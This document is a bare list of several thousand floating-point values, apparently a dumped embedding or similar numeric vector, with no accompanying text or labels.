0.011000225320458412, 0.0032508824951946735, -0.0019225262803956866, -0.010870980098843575, 0.005442670080810785, -0.024269426241517067, -0.01731889322400093, 0.031937990337610245, -0.044776372611522675, -0.014109296724200249, 0.008120923303067684, -0.023766804486513138, 0.008343513123691082, -0.0017268630908802152, -0.01413083728402853, -0.01575358584523201, 0.023063136264681816, -0.03236880898475647, -0.02073671668767929, 0.013807724229991436, 0.02500181831419468, 0.08185546100139618, 0.00560422707349062, -0.006419191602617502, -0.016643943265080452, -0.00977239292114973, -0.0030121374875307083, -0.00470309890806675, 0.02806062623858452, 0.0028451953548938036, -0.014762704260647297, 0.03205287456512451, -0.019458623602986336, -0.013613855466246605, 0.007083369418978691, 0.007338270545005798, 0.03305811807513237, 0.005331375636160374, 0.009111805818974972, 0.012910186313092709, -0.014410869218409061, 0.001757379388436675, 0.0072449264116585255, 0.01497811358422041, -0.017232729122042656, 0.017031680792570114, -0.008515840396285057, -0.005945291370153427, -0.01868315041065216, -0.009887278079986572, 0.0018561085453256965, -0.008178366348147392, 0.014935031533241272, -0.019745836034417152, 0.006763846147805452, 0.008400955237448215, -0.013563593849539757, 0.024614080786705017, 0.006566387601196766, -0.004049691371619701, -0.007761908229440451, 0.0029636702965945005, -0.018295414745807648, -0.011165372096002102, -0.00017513209604658186, -0.004096363205462694, -0.025935256853699684, 0.03173694387078285, -0.02155527099967003, -0.0015814618673175573, -0.008207087405025959, 0.004042510874569416, -0.028721215203404427, 0.017591744661331177, 0.04058307781815529, 0.011797239072620869, 0.027026662603020668, 0.005065704230219126, 0.0005030700122006238, -0.026997942477464676, -0.02244563028216362, -0.0025220816023647785, 0.026969220489263535, -0.0006830263882875443, -0.0020320259500294924, 0.007927055470645428, -0.013685658574104309, -0.03015727549791336, 0.01268759649246931, -0.014094935730099678, 0.0024484836030751467, 0.023537036031484604, -0.004721049685031176, -0.002771597122773528, -0.004347674082964659, 0.0113879619166255, 0.01129461731761694, -0.01163927186280489, 0.028132429346442223, -0.04540824145078659, -0.017074761912226677, 0.03030088171362877, 0.01576794683933258, 0.010332456789910793, 0.02706974558532238, -0.026610204949975014, 0.031105075031518936, -0.004534361883997917, -0.010641209781169891, -0.023723723366856575, 0.008745609782636166, -0.011581829749047756, -0.004099953453987837, -0.0033873082138597965, 0.010648390278220177, 0.003046243917196989, 0.03802688792347908, 0.023608839139342308, -0.009255411103367805, -0.009133346378803253, -0.010849438607692719, 0.013204578310251236, -0.001467474619857967, 0.02794574201107025, -0.002692613983526826, 0.006792567204684019, 0.021512189880013466, -0.01224241778254509, 0.016227485612034798, 0.00044338376028463244, -0.0011021766113117337, -0.04483381658792496, -0.04391473904252052, -0.011746976524591446, -0.03719397261738777, -0.007259286940097809, 0.0017959735123440623, 0.016715746372938156, 0.01869751140475273, -0.017850235104560852, -0.007151582278311253, -0.000665524392388761, -0.02227330207824707, 0.036935482174158096, -0.004778492264449596, -0.008587643504142761, 0.015839749947190285, -0.01011704746633768, -0.018798034638166428, 0.04948665201663971, 0.024614080786705017, 0.022574875503778458, 0.003367562545463443, -0.0029241787269711494, -0.01833849586546421, 0.011265896260738373, -0.05069294571876526, 0.026265550404787064, 0.01711784489452839, -0.015021195635199547, -0.0013409217353910208, -0.010985864326357841, 0.02929563820362091, 0.017361974343657494, 0.0044015259481966496, 0.017577383667230606, 0.00361887295730412, 0.019602229818701744, 0.015509456396102905, 0.003920445684343576, 0.01882675662636757, 0.013628216460347176, -0.0094061978161335, 0.002234869636595249, 0.04331159219145775, -0.0004023213987238705, 0.006666911765933037, 0.0003480203449726105, -0.02673945017158985, -0.008020399138331413, 0.01540893130004406, 0.011560289189219475, 0.03877364099025726, 0.03547070175409317, -0.00007668339821975678, 0.0019656082149595022, 0.037251416593790054, -0.019745836034417152, -0.041875530034303665, -0.023264184594154358, -0.005758603569120169, 0.0069541241973638535, 0.008149644359946251, -0.018568266183137894, 0.013613855466246605, 0.02243126928806305, 0.02261795662343502, -0.017232729122042656, -0.01832413487136364, 0.018266692757606506, -0.028563247993588448, -0.007639843039214611, 0.029697736725211143, -0.014453951269388199, -0.010497603565454483, 0.031765662133693695, -0.006792567204684019, 0.012658875435590744, 0.0008540073758922517, -0.0243268683552742, 0.01901344396173954, 0.01268759649246931, 0.03478139266371727, -0.021713238209486008, -0.02498745732009411, -0.02468588389456272, -0.019228853285312653, -0.020478226244449615, -0.016672665253281593, 0.0024933605454862118, 0.007226975634694099, -0.0020374110899865627, -0.01463345903903246, -0.010217572562396526, -0.010576587170362473, 0.0031180467922240496, -0.02121061645448208, 0.01624184660613537, 0.0028451953548938036, -0.0135420523583889, -0.00014405483670998365, -0.016414174810051918, 0.0021163944620639086, 0.01744813844561577, -0.005956062115728855, 0.0229482501745224, 0.007219795603305101, 0.00924105104058981, -0.02123933844268322, -0.005101605784147978, 0.018367215991020203, -0.012981989420950413, 0.03067425824701786, 0.02092340588569641, 0.00770446565002203, -0.013204578310251236, 0.01727581024169922, 0.03446545824408531, -0.02230202406644821, -0.0120772710070014, 0.0040927729569375515, -0.0029241787269711494, 0.0009639557683840394, 0.015495095402002335, 0.007004386279731989, -0.015394571237266064, -0.008630724623799324, 0.005837586708366871, 0.007431614212691784, 0.012536810711026192, -0.023537036031484604, 0.01608387939631939, 0.011057667434215546, -0.03529837355017662, 0.010411440394818783, -0.0281180702149868, -0.0002876609214581549, 0.0019835589919239283, 0.0066705020144581795, -0.006900271866470575, 0.04098517447710037, -0.014497033320367336, 0.0011093568755313754, -0.011359240859746933, 0.009111805818974972, -0.016012078151106834, 0.02332162670791149, 0.021684518083930016, 0.0032813989091664553, 0.0042651002295315266, 0.006530486047267914, 0.0016451870324090123, -0.0027787776198238134, 0.0070295175537467, 0.012278319336473942, -0.015049916692078114, 0.039491672068834305, -0.010425801388919353, -0.005582686048001051, 0.003046243917196989, -0.0008207984501495957, -0.002017665421590209, -0.013326643966138363, 0.00047479759086854756, -0.006333027966320515, 0.006110438611358404, -0.0031665139831602573, -0.004250739701092243, -0.024585360661149025, -0.002653122181072831, 0.005367277190089226, -0.00625045457854867, 0.055575549602508545, 0.004889786709100008, -0.003941986709833145, -0.004064051900058985, -0.02155527099967003, -0.047878265380859375, 0.0013113029999658465, 0.009442099370062351, -0.014906310476362705, 0.0033603820484131575, 0.010892520658671856, -0.02258923463523388, -0.026064502075314522, 0.017074761912226677, 0.00500467186793685, -0.029209475964307785, 0.035011161118745804, -0.023910410702228546, 0.01678754948079586, 0.026509681716561317, 0.023709362372756004, 0.024901293218135834, 0.016414174810051918, 0.00663819070905447, 0.015624340623617172, -0.023953493684530258, -0.022129695862531662, 0.009535443037748337, -0.01868315041065216, 0.023364707827568054, -0.01173261646181345, -0.011596190743148327, -0.030444487929344177, -0.001875854330137372, -0.0022707709576934576, 0.004907737486064434, 0.0035416847094893456, -0.017591744661331177, 0.008580463007092476, -0.008379414677619934, -0.016916794702410698, -0.010813537053763866, -0.030099833384156227, -0.006045815534889698, 0.004778492264449596, -0.01173261646181345, 0.003046243917196989, -0.0056796204298734665, -0.01165363285690546, 0.013376905582845211, 0.011423863470554352, 0.00590580003336072, -0.013319463469088078, 0.0060888975858688354, -0.007474696263670921, 0.008214267902076244, 0.019113969057798386, -0.0060888975858688354, -0.006157110445201397, -0.0288073793053627, 0.053536344319581985, -0.008436856791377068, 0.0042220186442136765, 0.02620810829102993, 0.009478000923991203, -0.00003225526961614378, 0.02447047457098961, -0.003654774511232972, -0.024054016917943954, -0.024054016917943954, -0.012737859040498734, 0.013068152591586113, -0.004275870975106955, 0.00033051834907382727, 0.0029690556693822145, 0.0026890237350016832, -0.0008764458470977843, -0.006103258114308119, -0.026165027171373367, -0.01624184660613537, 0.0035021931398659945, 0.004182526841759682, -0.0018471331568434834, 0.0014620893634855747, 0.008271710015833378, -0.018783673644065857, 0.029065869748592377, 0.018884198740124702, -0.02161271497607231, -0.010791996493935585, 0.012622973881661892, -0.0016451870324090123, 0.013053792528808117, 0.013348184525966644, 0.0004243110597599298, 0.026926139369606972, -0.015566898509860039, -0.03254113718867302, 0.03119123913347721, 0.01344152819365263, -0.002380270743742585, -0.005981192924082279, -0.020277177914977074, -0.03719397261738777, 0.020995207130908966, -0.011244355700910091, 0.005528833717107773, -0.001830079942010343, -0.0037373481318354607, 0.008321971632540226, 0.00770446565002203, 0.027672890573740005, 0.038802362978458405, 0.018582625314593315, -0.016830632463097572, 0.02586345374584198, 0.01779279299080372, -0.033517658710479736, 0.001315790694206953, 0.019214492291212082, 0.007137221749871969, -0.012981989420950413, 0.01899908296763897, -0.008149644359946251, 0.005029802676290274, -0.00934157520532608, -0.02551879920065403, 0.028175512328743935, 0.001182954991236329, 0.008006039075553417, -0.001999714644625783, 0.032282646745443344, -0.017907677218317986, 0.0013005324872210622, 0.0018148217350244522, -0.014705262146890163, -0.024269426241517067, -0.01206291001290083, 0.014181099832057953, 0.02194300852715969, -0.0009217715123668313, -0.02055002935230732, -0.03814177215099335, 0.015983356162905693, -0.010526325553655624, 0.01730453222990036, -0.0058160461485385895, 0.010131408460438251, 0.00612838938832283, 0.013283561915159225, 0.015222243964672089, 0.014863228425383568, 0.007826531305909157, 0.008357873186469078, 0.004505640361458063, -0.026610204949975014, -0.0042579201981425285, 0.0014665770577266812, -0.01780715398490429, 0.010827898047864437, -0.009779573418200016, -0.013922608457505703, 0.014834507368505001, 0.006530486047267914, -0.005726292263716459, -0.017764071002602577, 0.0033316609915345907, 0.0046851481311023235, 0.0053780474700033665, 0.013068152591586113, -0.00021933583775535226, 0.004961589816957712, 0.00043956920853815973, 0.002617220627143979, -0.001981763867661357, 0.011258715763688087, 0.013850806280970573, -0.0017089123139157891, 0.010131408460438251, 0.006142749916762114, -0.026509681716561317, 0.026638926938176155, 0.003791200462728739, -0.0014593966770917177, 0.018295414745807648, -0.005981192924082279, 0.0012089835945516825, -0.0038163315039128065, -0.037768397480249405, 0.019271934404969215, 0.004972360096871853, 0.013987231999635696, 0.00003508812369545922, -0.015595619566738605, -0.017347613349556923, -0.01609824039041996, -0.011158191598951817, 0.005622177850455046, -0.007474696263670921, 0.00924105104058981, 0.0023730904795229435, -0.00889639649540186, 0.02741440013051033, -0.00048691435949876904, 0.02332162670791149, -0.0012359097599983215, 0.005255982279777527, -0.0018453380325809121, 0.013283561915159225, -0.0006641781073994935, 0.00411431398242712, -0.007025927305221558, -0.0021917878184467554, 0.019817639142274857, 0.017089122906327248, -0.005381637718528509, 0.021454747766256332, 0.024111459031701088, -0.0024484836030751467, -0.0038378722965717316, 0.0018282848177477717, 0.012292680330574512, 0.017189648002386093, 0.019674032926559448, -0.005001081619411707, -0.010583767667412758, 0.0009186301031149924, 0.007625482510775328, -0.002864941256120801, -0.002895457437261939, 0.009485181421041489, 0.000008007721589819994, 0.017577383667230606, 0.0113879619166255, 0.006429961882531643, -0.017419416457414627, 0.001279889140278101, -0.005446260329335928, 0.007007976528257132, 0.002502335933968425, 0.009212329983711243, 0.00024480349384248257, -0.013678479008376598, -0.007984497584402561, 0.007582400925457478, -0.00295290001668036, -0.00301931775175035, -0.007927055470645428, -0.010914061218500137, -0.0012745038839057088, -0.0022528201807290316, -0.0031180467922240496, -0.012543990276753902, 0.0009352345368824899, -0.0029708505608141422, 0.02158399298787117, -0.01594027504324913, 0.008989740163087845, -0.013434348627924919, 0.009233870543539524, -0.004520001355558634, 0.002017665421590209, 0.018582625314593315, -0.0034680867101997137, -0.01797948032617569, 0.005453440826386213, -0.01317585725337267, -0.021785041317343712, 0.004333313088864088, -0.0028631461318582296, -0.002820064313709736, -0.005220080725848675, -0.024355590343475342, -0.014288804493844509, 0.007948596030473709, -0.010224752128124237, 0.006867960561066866, -0.008221447467803955, 0.021627074107527733, -0.008171185851097107, -0.013211758807301521, 0.011445404030382633, 0.025920895859599113, 0.008192726410925388, 0.012637334875762463, -0.0008347103139385581, 0.019487343728542328, -0.011976746842265129, -0.031248681247234344, 0.009276952594518661, 0.005485752131789923, -0.015882831066846848, 0.02109573222696781, -0.009011280722916126, 0.0012018033303320408, -0.0013516921317204833, -0.0034932177513837814, 0.0021253698505461216, -0.011280257254838943, 0.023264184594154358, 0.025418275967240334, -0.015968995168805122, 0.0013741306029260159, -0.009822655469179153, -0.017261449247598648, 0.025131063535809517, -0.018884198740124702, -0.04009481519460678, -0.009880097582936287, 0.009463639929890633, 0.011014586314558983, -0.014626278541982174, -0.007726006675511599, -0.00916206743568182, -0.00737417209893465, -0.019788917154073715, 0.005403178744018078, -0.009951900690793991, 0.009169247932732105, -0.008257349021732807, 0.011538747698068619, -0.013707200065255165, -0.008178366348147392, -0.006648961454629898, 0.007761908229440451, 0.009233870543539524, 0.018381576985120773, -0.01920013129711151, -0.02189992554485798, 0.005191359668970108, -0.014690901152789593, 0.001751994132064283, 0.0018650839338079095, -0.0058052754029631615, -0.0147483441978693, -0.002595679834485054, 0.0008383004460483789, 0.00926259160041809, -0.03050193004310131, 0.02144038677215576, 0.006735125090926886, 0.0008414418553002179, 0.013728740625083447, 0.012400384061038494, 0.004746180959045887, 0.004430247470736504, -0.0040748221799731255, 0.00993036013096571, 0.013233299367129803, 0.007711646147072315, 0.02635171450674534, 0.009212329983711243, 0.008946658112108707, -0.0006453297683037817, 0.028678132221102715, -0.006530486047267914, -0.013958510011434555, 0.013017890974879265, -0.008020399138331413, 0.004663607105612755, -0.004627705551683903, 0.0010932012228295207, 0.0044015259481966496, 0.00006922261673025787, 0.018812395632267, 0.009542623534798622, 0.0011461559915915132, -0.011495666578412056, 0.007352631073445082, 0.0062612248584628105, 0.0066884527914226055, -0.012184975668787956, 0.025044899433851242, 0.00942773837596178, -0.01266605593264103, -0.009413378313183784, 0.001985353883355856, 0.014482672326266766, -0.0008387492271140218, 0.01762046478688717, -0.00024031578504946083, -0.008020399138331413, 0.0010958939092233777, 0.0011371806031093001, -0.0028972525615245104, 0.008925117552280426, -0.0026746632065624, 0.01156746968626976, 0.008501479402184486, -0.006767436396330595, 0.011869042180478573, -0.011237175203859806, 0.01868315041065216, -0.009399017319083214, 0.001234114752151072, -0.0069792550057172775, -0.0058232261799275875, -0.011976746842265129, 0.000048579240683466196, 0.020794158801436424, -0.005026212427765131, 0.005080064758658409, 0.008724069222807884, 0.011107929982244968, -0.024413032457232475, -0.026624565944075584, 0.004153805784881115, -0.004272280726581812, 0.007255696691572666, 0.007560859899967909, -0.002841605106368661, 0.016902435570955276, -0.004613345023244619, 0.007819350808858871, -0.038428984582424164, -0.011739796958863735, 0.02194300852715969, 0.000986394239589572, 0.011689534410834312, 0.000971136090811342, -0.006110438611358404, -0.007097730413079262, 0.01796511933207512, -0.017764071002602577, 0.019817639142274857, -0.005054933950304985, 0.008709708228707314, 0.006745895370841026, -0.008587643504142761, 0.022847726941108704, -0.0024466884788125753, 0.010684291832149029, -0.008120923303067684, -0.0021056239493191242, 0.018740592524409294, -0.005956062115728855, -0.013570774346590042, 0.008436856791377068, -0.026638926938176155, -0.005191359668970108, 0.005471391603350639, -0.0018507232889533043, -0.011675173416733742, -0.0048143938183784485, -0.0023425740655511618, -0.015452013351023197, -0.018869837746024132, -0.016485977917909622, 0.012177795171737671, 0.005780144594609737, 0.00432613305747509, 0.04517846927046776, 0.01816616766154766, -0.00002102202233800199, -0.0021917878184467554, 0.008623545058071613, -0.0236375592648983, -0.0015419701812788844, 0.006745895370841026, 0.024570999667048454, 0.00829325057566166, 0.0014863228425383568, -0.0034142343793064356, 0.009808294475078583, 0.013025070540606976, -0.009915999136865139, 0.00822862796485424, -0.02401093579828739, 0.021296780556440353, -0.01799384132027626, 0.016399813815951347, -0.0027303104288876057, 0.015983356162905693, 0.012989168986678123, -0.003498602891340852, -0.0033424312714487314, -0.005981192924082279, -0.003730167867615819, -0.013412807136774063, 0.004473329056054354, 0.02398221381008625, 0.022043531760573387, 0.013664118014276028, 0.003371152561157942, 0.010368358343839645, -0.004408706445246935, -0.02774469368159771, -0.030042391270399094, -0.010777635499835014, -0.00014237196592148393, 0.0008190033840946853, 0.029338721185922623, -0.011725435964763165, 0.0005784631939604878, -0.004484099801629782, 0.019286295399069786, -0.004250739701092243, 0.007711646147072315, -0.00033837181399576366, 0.008724069222807884, -0.004096363205462694, -0.017749710008502007, 0.007790629751980305, 0.02840528078377247, -0.010569406673312187, 0.012127532623708248, 0.013434348627924919, 0.01762046478688717, -0.006193011999130249, 0.001288864528760314, 0.0008948453469201922, -0.016141323372721672, -0.013980051502585411, 0.008666626177728176, -0.003884544363245368, -0.00659510912373662, 0.0007911797147244215, -0.0009298493387177587, -0.013649757020175457, -0.007769088726490736, -0.01729017123579979, -0.00806348118931055, 0.013419987633824348, -0.0011524386936798692, 0.005966832395642996, 0.013893887400627136, 0.008882035501301289, 0.007596761453896761, 0.006350978743284941, -0.013886707834899426, -0.009377476759254932, -0.04181808978319168, -0.0019386820495128632, 0.012881465256214142, 0.009535443037748337, -0.006508945487439632, 0.023709362372756004, 0.023034414276480675, -0.006928992923349142, 0.01695987768471241, 0.003058809321373701, 0.002669277833774686, -0.011495666578412056, 0.013527692295610905, -0.014339066110551357, 0.000326703826431185, -0.018568266183137894, 0.01885547675192356, -0.009829835966229439, -0.014669360592961311, 0.01189776323735714, 0.011775698512792587, -0.02280464395880699, -0.009564164094626904, 0.004466149024665356, -0.004322542808949947, -0.021023929119110107, -0.014267263934016228, 0.018395937979221344, -0.0000056166240938182455, 0.0075464993715286255, 0.03165077790617943, -0.0035811765119433403, 0.002798523288220167, 0.0037050368264317513, -0.011072028428316116, 0.005327785387635231, 0.0065520270727574825, 0.008666626177728176, 0.007366991601884365, -0.0021289600990712643, -0.01813744753599167, 0.024025296792387962, 0.002803908661007881, 0.009097444824874401, 0.0020140751730650663, -0.018036922439932823, 0.0012421925785019994, 0.005051343701779842, 0.012737859040498734, 0.02141166478395462, 0.01763482578098774, -0.018367215991020203, -0.0059776026755571365, 0.000671807152684778, -0.0016900639748200774, -0.018970362842082977, -0.0263947956264019, -0.00010933134035440162, -0.004003019537776709, -0.005327785387635231, 0.006857189815491438, 0.008178366348147392, -0.007212615106254816, -0.0058052754029631615, 0.007726006675511599, -0.012694776989519596, -0.03768223524093628, 0.03325916826725006, -0.006785387173295021, 0.007761908229440451, -0.00638329004868865, -0.006573568098247051, -0.0068176984786987305, -0.015452013351023197, 0.0014091345947235823, 0.015107358805835247, 0.005036983173340559, -0.024614080786705017, -0.01181877963244915, 0.01396569050848484, -0.003733757883310318, 0.03799816593527794, 0.01937245950102806, 0.011861861683428288, -0.011524387635290623, -0.004250739701092243, -0.0042112478986382484, -0.00005390837395680137, -0.007589580956846476, -0.0019099607598036528, -0.02329290471971035, 0.030760420486330986, 0.005090835504233837, 0.017361974343657494, -0.011725435964763165, -0.021813763305544853, -0.003372947685420513, 0.016385452821850777, 0.012357302941381931, 0.02826167456805706, -0.002450278727337718, -0.009205149486660957, 0.003319095354527235, -0.0007472003344446421, -0.018094364553689957, -0.00731672951951623, -0.021368583664298058, 0.005288293585181236, 0.01951606571674347, 0.003697856329381466, -0.006376109551638365, 0.0027267204131931067, -0.007898334413766861, -0.009729311801493168, 0.013233299367129803, -0.020937765017151833, -0.01327638141810894, -0.018036922439932823, 0.005374457221478224, 0.006577158346772194, 0.0220866147428751, 0.01816616766154766, -0.032110318541526794, -0.0032024155370891094, 0.01275221910327673, 0.007697285618633032, -0.01901344396173954, 0.0029762359336018562, -0.015265326015651226, -0.0019781736191362143, 0.0023856558836996555, -0.010641209781169891, -0.02280464395880699, -0.023766804486513138, -0.010203211568295956, 0.0008333639707416296, 0.01463345903903246, -0.005327785387635231, 0.010059605352580547, 0.0027662119828164577, -0.002877506660297513, -0.016859352588653564, -0.02241690829396248, -0.014073395170271397, -0.006092487834393978, 0.010346817784011364, 0.02451355755329132, -0.009679049253463745, -0.012120353057980537, -0.01104330737143755, 0.011603371240198612, 0.019645310938358307, -0.0021128044463694096, -0.014109296724200249, -0.011940845288336277, -0.0020050997845828533, 0.0033424312714487314, 0.00527034280821681, -0.016141323372721672, -0.01849646307528019, 0.023249823600053787, 0.01542329229414463, -0.016069520264863968, 0.010655570775270462, 0.003354996908456087, -0.013183037750422955, 0.009908819571137428, 0.0010806357022374868, -0.015509456396102905, -0.01625620760023594, -0.03386231139302254, -0.022345105186104774, 0.005772964097559452, -0.007051058113574982, -0.005442670080810785, 0.0064156013540923595, 0.016069520264863968, -0.0038630033377557993, -0.008767151273787022, -0.018252331763505936, 0.016026437282562256, 0.006946943700313568, 0.020980847999453545, -0.02327854372560978, 0.008343513123691082, 0.0028703263960778713, 0.007934235967695713, -0.03429313004016876, -0.004035330843180418, 0.002387451007962227, -0.015250965021550655, -0.00013384534395299852, -0.007532138377428055, 0.00321318581700325, -0.014963752590119839, 0.017548661679029465, 0.018711870536208153, -0.005665259435772896, 0.02448483556509018, 0.004089183174073696, -0.01954478584229946, -0.0010483243968337774, 0.01471962220966816, 0.013563593849539757, -0.020765438675880432, 0.005690390709787607, -0.020506948232650757, 0.015365850180387497, -0.008609184063971043, 0.0019530425779521465, -0.017247090116143227, -0.019113969057798386, -0.023206742480397224, -0.012960447929799557, -0.0057370625436306, -0.024355590343475342, -0.0032598578836768866, -0.0036027173046022654, 0.019961243495345116, 0.003941986709833145, 0.004096363205462694, 0.00046223204117268324, 0.0019081657519564033, 0.018281053751707077, 0.011761337518692017, 0.0074100736528635025, -0.0007391225080937147, 0.003615282941609621, -0.014777065254747868, 0.007783449254930019, -0.029841342940926552, 0.0031665139831602573, -0.01072019338607788, -0.00013799646694678813, -0.011186913587152958, -0.019243214279413223, -0.011517207138240337, -0.01644289493560791, -0.000023364034859696403, 0.0063976505771279335, -0.017706628888845444, -0.0147483441978693, 0.005331375636160374, -0.011581829749047756, 0.013369725085794926, 0.01813744753599167, -0.013262021355330944, 0.006017094478011131, -0.011510026641190052, -0.021167535334825516, -0.01260143332183361, 0.0250161774456501, 0.025777289643883705, 0.0002777879999484867, -0.02429814822971821, -0.0019171411404386163, -0.01832413487136364, 0.031765662133693695, -0.004168166313320398, 0.008709708228707314, -0.021110093221068382, -0.006702813319861889, -0.0010249883634969592, -0.001833670074120164, -0.005496522411704063, -0.010555046610534191, 0.0036404139827936888, 0.006343798246234655, -0.007632663007825613, 0.004397936165332794, 0.016141323372721672, -0.0004864655784331262, 0.007467515766620636, -0.002511311322450638, 0.007639843039214611, 0.015222243964672089, 0.013563593849539757, 0.02345087192952633, -0.009090264327824116, 0.00659510912373662, -0.0009899843716993928, -0.0071264514699578285, -0.006056586280465126, -0.003218571189790964, 0.0006314179627224803, 0.02517414465546608, 0.000602247950155288, -0.01627056859433651, -0.0006700120866298676, -0.015207882970571518, 0.017160926014184952, -0.006875140592455864, -0.008343513123691082, 0.029252557083964348, 0.000953185313846916, 0.01869751140475273, 0.016730107367038727, -0.000005809454705740791, 0.003676315536722541, 0.0020248456858098507, -0.011711074970662594, -0.014611918479204178, -0.00419329758733511, -0.0012143688509240746, 0.0059883734211325645, -0.020980847999453545, -0.007876792922616005, -0.028821738436818123, 0.00786961242556572, -0.01378618273884058, 0.01645725592970848, -0.0027877530083060265, -0.018769314512610435, -0.013649757020175457, -0.010073966346681118, -0.00008436857024207711, 0.004060461651533842, -0.02347959391772747, -0.008867675438523293, -0.036590829491615295, -0.02108137123286724, 0.03647594153881073, 0.005819635931402445, -0.00280211353674531, -0.011991106905043125, -0.002371295355260372, -0.023393429815769196, 0.003916855901479721, -0.007582400925457478, -0.002087673405185342, 0.01275221910327673, 0.002859555883333087, -0.033316608518362045, -0.0003893070970661938, -0.007402893155813217, -0.023364707827568054, 0.0032508824951946735, 0.008350693620741367, -0.05057805776596069, 0.0006309691816568375, 0.01645725592970848, -0.013132775202393532, 0.0007099525537341833, 0.0015509455697610974, -0.01865442842245102, 0.0037086268421262503, 0.024197623133659363, 0.004160985816270113, -0.0022941071074455976, -0.006189421750605106, -0.010562227107584476, 0.003809151006862521, -0.0017286580987274647, -0.028319118544459343, 0.001697244239039719, 0.015624340623617172, -0.00786961242556572, -0.0000160575145855546, 0.0037445283960551023, 0.017175287008285522, -0.014367788098752499, 0.02429814822971821, 0.016529059037566185, 0.02159835398197174, 0.009197968989610672, -0.007819350808858871, -0.023838607594370842, 0.0015994126442819834, 0.011352060362696648, -0.0015787692973390222, 0.012759399600327015, -0.006318667437881231, 0.004523591138422489, 0.010461702942848206, -0.010131408460438251, -0.028477083891630173, 0.0052416217513382435, 0.00865226611495018, -0.0032329317182302475, -0.013836445286870003, 0.012098811566829681, 0.035011161118745804, 0.02790266089141369, -0.015839749947190285, 0.00004942068335367367, 0.010835078544914722, 0.030616814270615578, 0.030099833384156227, 0.004965180065482855, -0.002723130164667964, -0.003380127949640155, -0.008164005354046822, -0.009729311801493168, 0.005575506016612053, 0.0012771965702995658, 0.009887278079986572, 0.010081146843731403, 0.00376965943723917, 0.018123086541891098, 0.006329437717795372, -0.013341004028916359, -0.0024861800484359264, -0.016557781025767326, 0.012745039537549019, -0.003204210428521037, 0.008400955237448215, 0.013039431534707546, 0.013427168130874634, -0.010827898047864437, -0.010131408460438251, -0.00041286746272817254, -0.004907737486064434, 0.005991963669657707, -0.004710279405117035, -0.011976746842265129, 0.006412011105567217, -0.008444037288427353, 0.02106701023876667, 0.010296555235981941, -0.013656937517225742, 0.003525529056787491, 0.0147483441978693, 0.022517431527376175, 0.012120353057980537, 0.014260083436965942, 0.00157338404096663, 0.014676541090011597, -0.02398221381008625, -0.006555617321282625, 0.003712217090651393, 0.01865442842245102, -0.006271995138376951, 0.003712217090651393, 0.030387045815587044, 0.00143426563590765, -0.0014773474540561438, 0.015710504725575447, 0.013743101619184017, -0.013513331301510334, 0.018223611637949944, -0.0018049489008262753, -0.01155310869216919, -0.008702527731657028, 0.019745836034417152, -0.005489342380315065, 0.006627420429140329, -0.01954478584229946, 0.01165363285690546, -0.00788397341966629, -0.0025705487933009863, 0.014073395170271397, -0.01884111762046814, -0.011782878078520298, 0.003222161205485463, -0.0060888975858688354, 0.0004029945412185043, 0.00561499735340476, -0.011409502476453781, -0.0007045672973617911, 0.008838953450322151, 0.0072449264116585255, 0.00034241072717122734, -0.006476633716374636, -0.008106563240289688, -0.0011820575455203652, -0.0016056954627856612, -0.0013516921317204833, -0.011165372096002102, -0.001149746123701334, 0.009801114909350872, -0.008458397351205349, -0.00018354650819674134, -0.016816271468997, -0.0038917246274650097, -0.008659446612000465, -0.010827898047864437, -0.013491790741682053, 0.01764918677508831, -0.005019032396376133, 0.021382944658398628, -0.006236093584448099, 0.010038064792752266, -0.023393429815769196, 0.015997717157006264, -0.008853314444422722, -0.027184629812836647, 0.005877078510820866, 0.009513902477920055, 0.012328581884503365, 0.026940500363707542, -0.01473398320376873, -0.011366420425474644, 0.029898785054683685, 0.0030659895855933428, -0.003870183601975441, -0.0014593966770917177, -0.0021828124299645424, 0.02448483556509018, 0.016299288719892502, 0.016012078151106834, 0.0031216370407491922, -0.004200477618724108, 0.0008800359792076051, 0.0024125820491462946, -0.009233870543539524, -0.00021080923033878207, 0.02327854372560978, -0.03834282234311104, -0.002039206214249134, -0.007582400925457478, 0.02023409493267536, -0.004329723306000233, 0.01294608786702156, 0.014791425317525864, -0.01849646307528019, -0.03047320805490017, -0.016069520264863968, -0.00445896852761507, 0.011064847931265831, 0.0024305328261107206, 0.031794384121894836, 0.010224752128124237, 0.009305673651397228, 0.005593456793576479, -0.009822655469179153, 0.018424659967422485, 0.005281113553792238, 0.000726108206436038, -0.012680415995419025, -0.009973442181944847, 0.0031790793873369694, -0.0027572365943342447, -0.01852518320083618, -0.0017448137514293194, -0.011316158808767796, 0.01642853580415249, 0.020176652818918228, 0.01463345903903246, -0.011057667434215546, -0.018439019098877907, 0.0030965059995651245, -0.015624340623617172, -0.011703895404934883, 0.01412365771830082, 0.020664913579821587, -0.0034680867101997137, -0.006167880725115538, -0.0027967283967882395, 0.00786961242556572, 0.006024274975061417, 0.013577953912317753, -0.002391041023656726, -0.01799384132027626, -0.017505580559372902, 0.011581829749047756, 0.026279911398887634, 0.0006812313222326338, 0.008630724623799324, 0.013915428891777992, -0.015480734407901764, -0.0014710647519677877, -0.01835285685956478, -0.009973442181944847, 0.005999143701046705, -0.013807724229991436, -0.0056508989073336124, 0.007445974741131067, -0.04006609320640564, 0.02276156283915043, 0.010476063005626202, -0.013434348627924919, 0.008221447467803955, -0.009714950807392597, -0.0017887931317090988, -0.005909389816224575, 0.017247090116143227, 0.00590580003336072, 0.011265896260738373, -0.010935602709650993, -0.029755178838968277, 0.01764918677508831, 0.001194623066112399, -0.0005515370867215097, 0.008666626177728176, -0.017563022673130035, 0.020305898040533066, 0.01094996277242899, 0.012314220890402794, -0.001639801892451942, -0.008350693620741367, -0.01096432376652956, 0.006264815106987953, -0.0024574589915573597, 0.011646452359855175, 0.00958570558577776, -0.00865226611495018, 0.0005887849256396294, 0.007402893155813217, 0.0029600802809000015, -0.013944149948656559, 0.01782151311635971, -0.03360382094979286, 0.0055324239656329155, 0.00728441821411252, -0.0121634341776371, 0.007898334413766861, -0.01915705017745495, 0.002338983817026019, -0.010332456789910793, -0.0008917039958760142, -0.0034627015702426434, -0.020449504256248474, -0.016672665253281593, -0.008759970776736736, -0.03170822188258171, 0.009032822214066982, -0.0012323196278885007, -0.009880097582936287, 0.007970137521624565, 0.0032670381478965282, -0.006763846147805452, -0.007007976528257132, -0.0031306124292314053, 0.0026064503472298384, -0.0042579201981425285, 0.00411431398242712, 0.01120845414698124, -0.011840321123600006, -0.002344369189813733, 0.005837586708366871, 0.011890582740306854, 0.018582625314593315, -0.022144056856632233, -0.011352060362696648, 0.004487690050154924, -0.004979540593922138, -0.010526325553655624, -0.015495095402002335, -0.019085247069597244, 0.022876447066664696, 